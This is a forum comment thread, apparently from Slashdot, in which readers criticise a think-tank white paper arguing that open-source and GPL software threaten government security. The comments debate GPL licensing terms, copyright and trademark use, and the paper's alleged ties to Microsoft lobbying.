So then why is open-source good? Seems to me that security is 80% of the benifit of open source. I guess MS's story is, 100% of the benifit of open source is 'borrowing' code, and 0% is security. Not surprising, but still infuriating.
Register Response (Score:2, Informative)
Binary Isn't Always "Locked" (Score:3, Funny)
Not so sure about this... I think we've all met programmers whose binaries were more readable than their source.
;)
Not Invented Here Syndrome (Score:4, Insightful)
Even Mandrake rewrote their installer to "differentiate" between Red Hat. Redhat doesn't include fontdrake, or any of their competitor GPL tools. It seems alot more like a bazaar of cathedrals to use the analogy.
If I write the ultimate Linux app, what are the chances that someone is going to 'steal my IP', or even if it is GPL, contribute back? Look at the ton of duplicate GPL programs.
If I were a programmer I think I'd GPL my software so people can look at the code and contribute patches - chances are some other OSS programmer is going to not like the language it was written in, which widget set I used, or whatever, and just rewrite it to suit their needs.
I have no numbers to back this up, just seems that most programmers and/or companies prefer to write their own software, regardless of reusable code or license.
Thousands of unknown Microsoft programmers??! (Score:5, Interesting)
If we blindly take the assumptions of this article then only some DoD funded Unix should be used for Mission/Life critical systems.
Re:Thousands of unknown Microsoft programmers??! (Score:2)
The moderators see fit to mod you up but you have no factual basis for your claims. I know people who are contracters at MS, and full time employees. First, they do pretty good background check on you. But that's really the point. Code just doesn't get checked in to CVS (lol!) without any sort of peer review and approval process. Think about OSS - can I, someone who has never hacked on a kernal, and someone who doesn't like GPL'd software, write some crap code and check it in to the Linux source tree?
The appendixes(sic) is incomplete (Score:2)
Wondering if this is not considered an Open Source license enough after all, even with all the fuss that Microsoft made about it...
Microsoft is just playing the game they want here, one day supporting Open source, the other day, bitching about it. Make up your mind, MSFT!
PPA, the girl next door.
Most Restrictive Licenses (Score:4, Informative)
The GPL is one of the most uniquely restrictive product agreements in the technology industry.
And, Yes, they have clicked ok to proprietary licenses much more restrictive than the GPL. These lines appear within their PDF file:
This simple fact can be easily verified with a command such as "stringsold_opensource_whitepaper.pdf| grep^/"
It is prudant (Score:2)
How many people have intimate knowlege of the internal code is irrelavent. What is relavent is how many experts have examined the code to be sure that it is correct. Before code is used for something like flight controll I would expect experts to examine it closely to be sure it worked right. (actually not, game programers with an AI can probably do a better job just rewarding their system for smooth flights even in turbluant weather, but that is a different debate)
100 experts paid by the goverment to assure the code is correct is not as good as 100 paid experts, plus 1000 amatures doing the same. And the existance of a few amatures sabotaging their work makes it better because it forces the experts to think things through. (when everything is expected to work you can be lazy with the rubber stamp, when some parts are suspected to be sabotaged you have to look closely)
There is a theory of testing which says you put some number of known bugs in the code without telling the testers. Don't stop testing until they find all the known bugs because that gives you the best chance of stumbling across the unknown bugs. (the countery argument is fixing known bugs cna introduce more so it isn't a clear win, but it is still a point to consider)
Should have included this quote: (Score:2, Interesting)
I guess you are probably not successful if you program open source. What do you suppose he means be successful?
5000 hours vs 100 hours (Score:4, Insightful)
first of all, if the 100 hours is GPLd, then the GPL isn't 'arguing' anything -- the rest *is* GPLd, according to the GPL. using the verb 'argue' here is like saying that my rental agreement 'puts forth the assertion' that i have to pay my landlord every month. it's not appropriate, because there's nothing to argue, no ambiguity. the GPL is very clear here.
second, if GPL'd software is, as the statement is clearly implying, a negligible part of the final product, what's the big deal with spending the other 100 hours to build that part yourself? no one's making you use that 100 hours worth of software.
and imagine how stupid that argument sounds when phrased this way: "i just built a huge program that only makes use of [some copyrighted product] in passing -- why should i have to conform to that company's contract terms in order to use it?" would anyone argue that degree of use is going to make any difference at all here? and if you don't like corporate-bashing, consider this example -- "sure, i stole $100 from you, but i put it towards this car that cost $5000, so why should I owe you anything at all?"
this is a stupid point. if you don't want to use GPLd code, don't, and if you do, understand the terms.
Re:5000 hours vs 100 hours (Score:3, Informative)
first of all, if the 100 hours is GPLd, then the GPL isn't 'arguing' anything -- the rest *is* GPLd, according to the GPL.
People make this mistake all the time, but it is a mistake. If someone includes some GPL'ed work into a larger work, the larger work is not magically licensed under the GPL. (Nor, for that matter, is the copyright of the larger work magically made the property of the FSF). Instead, what becomes true is that the ensemble work cannot be legally distributed without violating the terms of the (GPL) license for the 100 hours.
In this eventuality, what would happen would be that the copyright holder for that 100 hours of labor would sue the infringer, and in the best of all worlds, the infringer would be obligated through an injunction to cease distribution of the offending code. If the copyright holder for the 100 hours was willing, some monetary arrangement might be reached in return for an alternate license for the 100 hours of code.
The problematic case is where the 100 hours of code was written by five coders spread over the planet, and nobody bothered to track who had copyright over what piece of the code. In that instance, all five coders should agree to the relicensing. If one of the coders does not agree to the relicensing, then the problem of how to clean up the 5000+100 hours of code devolves into one of cleaning up the 100 hours of code.
There is nothing in the GPL that forces anyone to license code under the GPL, no matter how Microsoft may wish to construe it.
GPL fair? (Score:2, Redundant)
This "argument" really bothers me. What would they say to this: "If a software application represeting 5000 hours uses proprietary code reflecting only 100 hours, should the author really be guilty of copyright infringment?"
Last time I checked, no one was forced to use GPL code in their products. I think everyone would agree that the author of a piece of code is well within their rights to dictate the terms under which other people are allowed to use it. People who use the GPL effectively say, "I will share my code with you, however, you must share your code with me if you intend to use my code in your project".
Some people (e.g. those who use the BSD license) don't mind if others use their code without sharing in return. That is their perogative.
Man talk about old news. (Score:2, Informative)
These are the same guys who claimed that second hand smoke isn't harmful. Their panel of experts contained Scientists and Doctors who had previously been employeed by the Tobacco industry.
Article Link [smokefreeforhealth.org]
Do a search for ADTI in article.
You can view the article at Phillip Morris Tobaccos archive.
See:
Article Link [pmdocs.com]
Or the PDF at:
PDF Link [pmdocs.com]
Try a new approach (Score:2)
If you have something to say, why not start a petition? Why not write a well-written (as opposed to the one above) article and try to have a newspaper or respected journal publish it? Write your congressman (as I have done) and explain in a well-thought-out manner the points and counter points of why open source software is essential in maintaining the rate of innovation in the computer industry.
I'm not complaining, or trying to be a troll, but even if you copied and pasted some of these very good comments that appear here into an e-mail to some of the powers that be, it would do far more good, and would probably make you feel much better about your day as well.
Just my $0.02.
Microsoft's advantage (Score:2)
It may take MS too long to patch their stuff, but when the patch does come out, access to that patch is quick and easy. An update facility for *nix would be a huge step in combatting bugs and security problems. The facility need not be centralized, either; individual distributions or packages could have their own repositories.
Such a system could even go one step further than Microsoft and report when an unpatched hole is found, and give the option to disable that service 'til a fix is discovered. This would be highly appropriate for individuals, companies and governments who are worried about keeping their systems secure, and would keep them safer than any closed-source software can.
The most infuriating paragraph (Score:5, Interesting)
You bet they do, or else commercial interests would steal their work and profit from it, without due compensation to the creator.
I hear the Red Cross and Salvation Army have trademarks as well, which they zealously protect, even though they are in the business of giving stuff away to those in need.
The Free Software Foundation, the Open Source Initiative and a number of other organized GPL enthusiasts protect their "marks"...
Putting the word "marks" in quotes in this context seems to imply that not-for-profit trademark holders are not holding "real" trademarks, and therefore the author of the paper feels entitled to sneer at them.
This is the most damning section of the entire document, im my opinion. The author betrays his contempt for the fact that open source advocates utilize the copyright system as it was intended: to control the distribution of their works. What burns this author the most however, is that he knows they are correct and the GPL succeeds at its aims, which is preventing GPL code from being hijacked by proprietary, closed source projects. This makes him very angry, and he can barely conceal it in this paragraph.
While each of these firms would insist that they are not against copyright protection, invoking the protections argues that they are against people copying their marketing documents and symbols.
He left out the crucial phrase at the end of the sentence: "without authorization." This guy is really burned that the GPL is successful. And it seems clear to me now that "this guy" is the Microsoft FUD^WMarketing department. Their past FUD releases on this topic have been infamous for conflating trademark and copyright, as well as copyright and copy-prevention.
Now I gotta go take a walk, because I am worked up. But man, this is the most blatant and desperate FUD I have read in a long, long time.
How many people write software? (Score:4, Funny)
According to the BLS Computer and Mathematical Occupations [bls.gov] employ 2,932,810 total employment. Of those 374k are employeed in the development or the customization of applications.
Re:How many people write software? (Score:3, Funny)
I think they took the number of hours we worked and divided by 40.
Challenge accepted (Score:5, Interesting)
And your point, Mr. Brown, is exactly what?
First point: Today I mistakenly started up IE's infamous "Windows Update" feature for the Win2K installation on the SunPCI card in my Ultra 10. The first "update" it wanted to install was the MS "Automatic Updater" so that Microsoft could cram changes to my system software down my throat whenever they chose to. Mr. Gates does not own my hardware, the State of Texas does. Given Microsoft's track record in the security area, please explain to me the exact difference between this "feature" and a "back door or worse, a dangerous virus"?
Second point: Microsoft's "Windows update" service is ONLY available over the internet and is usually the ONLY source for critical security fixes and other patches for Microsoft products. Please tell me exactly how that differs from the normal distribution channel for GPL software.
Reverse engineering "harbors very close to IP infringement because and has staggering economic implications."
Please show me your bar number before you start rendering legal opinions, Mr. Brown. The only class of Intellectual Property that is infringed by reverse engineering is patents. Specifically, so-called "clean room" reverse engineering of copyrighted works has been repeatedly blessed by the courts as an exercise of the fair-use doctrine.
"On a lighter note, while many open source enthusiasts are proponents for copyleft, they insist on trademark protection for their ideas."
Mr. Brown, this "lighter note" comment of yours is little more than a cheap shot that openly displays your lack of understanding of the subject matter on which you write.
"Open source enthusiasts" not only avail themselves of trademark protection, they also assert and defend their rights as copyright holders. This in no way conflicts with their advocacy of the principle of copyleft. What it DOES do is give them the power to enforce the particular license (GPL, LGPL BSD, or other) under which they choose to release their software.
"If a software application representing 5000 hours uses GPL code that reflects only 100 hours, is the GPL fair in its argument that the entire product is GPL? This point is of considerable concern to software companies that value their secrets, design and architecture strategies. Proponents of the GPL argue that each party in the exchange is benefiting equally, but without a means to properly make this evaluation, this position at best is over-assuming."
Answering your questions in order:
Yes, if it's my GPL code, it most certainly IS fair. If Microsoft, Adobe, Symantec or whoever, wants to license my code for use in their proprietary product, I will be HAPPY to negotiate a special *non-exclusive* license with them for a SUBSTANTIAL fee. HOWEVER, if their objective is to take my code without payment and claim it as their own they had better be ready for MAJOR litigation.
"The federal government's information systems requirements intersect countless sensitive operations. The limitless potential for holes and back doors in an open source product would require unyielding scrutiny by staff that decided to use it. For example, if the Federal Aviation Agency were to develop an application (derived from open source) which controlled 747 flight patterns, a number of issues easily become national security questions such as:
They already do. The FAA's Air Traffic Control Database uses Oracle 9i Real Application Clusters running on Dell PowerEdge servers and (surprise!) Red Hat Linux.
Apparently the FAA thinks it's a better gamble than hoping that no one with an old copy of debug.exe will find a buffer overflow in Windows 2000 Advanced Server.
Again, you clearly demonstrate your lack of knowledge in this field, Mr. Brown. GPL software is NOT public domain. It is private property released for public use under license. It is no more public domain software than Windows XP. And
However, a more cogent inquiry would be "If the FAA's Air Traffic Control System is exposed to access from the public internet, shouldn't we fire all the boneheaded bureaucrats that decided it SHOULD be?"
Most of the
Mr. Brown, your white paper exhibits a failure of understanding of your subject that I find very disappointing in one who would call his operation a "think-tank". You entitle your publication "Opening the Open-Source Debate,"
Who is Andre Carter of Irimi Corporation ? (Score:5, Informative)
I googled for Andre Carter of Irimi Corpn whose comments Mr. Kenneth (or whatever frickin name he has) values more than anything else and this is what I found :
One pro-Microsoft observer credited Gates with being precise and helpful. "His testimony has been soaked with real-world examples, [and it shows] he understands the ramifications of how the states [want to affect his business]," said E. Andre Carter, CEO of Irimi, a Washington-based mobile and wireless consultancy, who also works for the pro-Microsoft lobbying group Americans for Technology Leadership.
BINGO!
When idiots like these make money by lying through their teeth, spread FUD and otherwise confuse the idiots who make decisions in the Senate and everywhere else, this industry, this country and the world we live in has such a fucked up future.
Re:Question (Score:2, Troll)
This trol^H^H^H^Harticle is special because it seems to think that Open Source is ok for security, but the GPL specifically is not. How exactly the GPL is any better for SECURITY than the BSD license, etc, is the question. (Hint: there is no fucking difference.
study is just a hack piece (Score:3, Insightful)
Even Allchin (under oath no less) testified that the GPL was one of the reasons that Microsoft did not include a SUN compliant JVM with XP.
What GPL has to do with a JVM from SUN is beyond me. But, that is the lie that Allchin put out to fool the court. And, the GPL was not even an issue in the trial.
I think Microsoft is just spending any money it can on bad mouthing the ideas it does not like. It does not matter if it is true or even relevant.
Besides, some bureaucrats only need a fake excuse anyway.
This fake study is just like the one a few weeks back bad mouthing linux on mainframes. It does not make any sense except the Microsoft salesman will be sure to refer to it during their sales pitches. After all, customers are assumed to be pretty stupid by Microsoft.
Re:Question (Score:5, Informative)
"Don't like the 'viral' nature of the GPL? Try this: WRITE YOUR OWN CODE"
If a business doesn't want to give away their code, they shouldn't weave in GPL source to begin with. If they do so, it's their OWN damn fault, not the GPL's.
Secondly, I still fail to see how this has anything to do with security. Open source is open source - whether released BSD/MIT style or GPL, it's STILL "open to hackers", which I thought was the point of the whole "risk" of Open Source security in the first place.
Re:Question (Score:2)
Re:Question (Score:3, Insightful)
Re:I'm sorry but they, of course, make a point (Score:2)
Yes, but the reason they give is completely bogus. They assert that a programmer could hide some piece of malicious code in the program that could "could contain a critical problem, a backdoor or worse, a dangerous virus."
Uh, isn't that the problem with CLOSED source? With a closed source project, you really don't know what sort of things the programmer has hidden in there. At least with open source, you can LOOK AT THE CODE and check!
-S
Re:Who's paying these chuckleheads? (Score:3, Interesting)
Re:Just being GPL not necessarily less secure... (Score:3, Insightful)
That is incorrect. You are allowed to take a GPL'ed program, modify it to your hearts' content, and never release a single line of source code to anyone. Only if you then *distribute* the code to anyone else do you have to offer up the code. You have the right to not share. But, if you do share, you have to share completley.
Re:Executable Software vs. Binary Code (Score:2)
"Not only did Netscape crush competition with its free browser model, but it also infuriated members of the open source community by aggressively introducing proprietary standards to the public Internet, something they felt no one should own. Conveniently, Netscape turned its enemies to Microsoft and their new browsers, Internet Explorer".
Count the number of bald factual errors, and false insinuations. In just two sentences.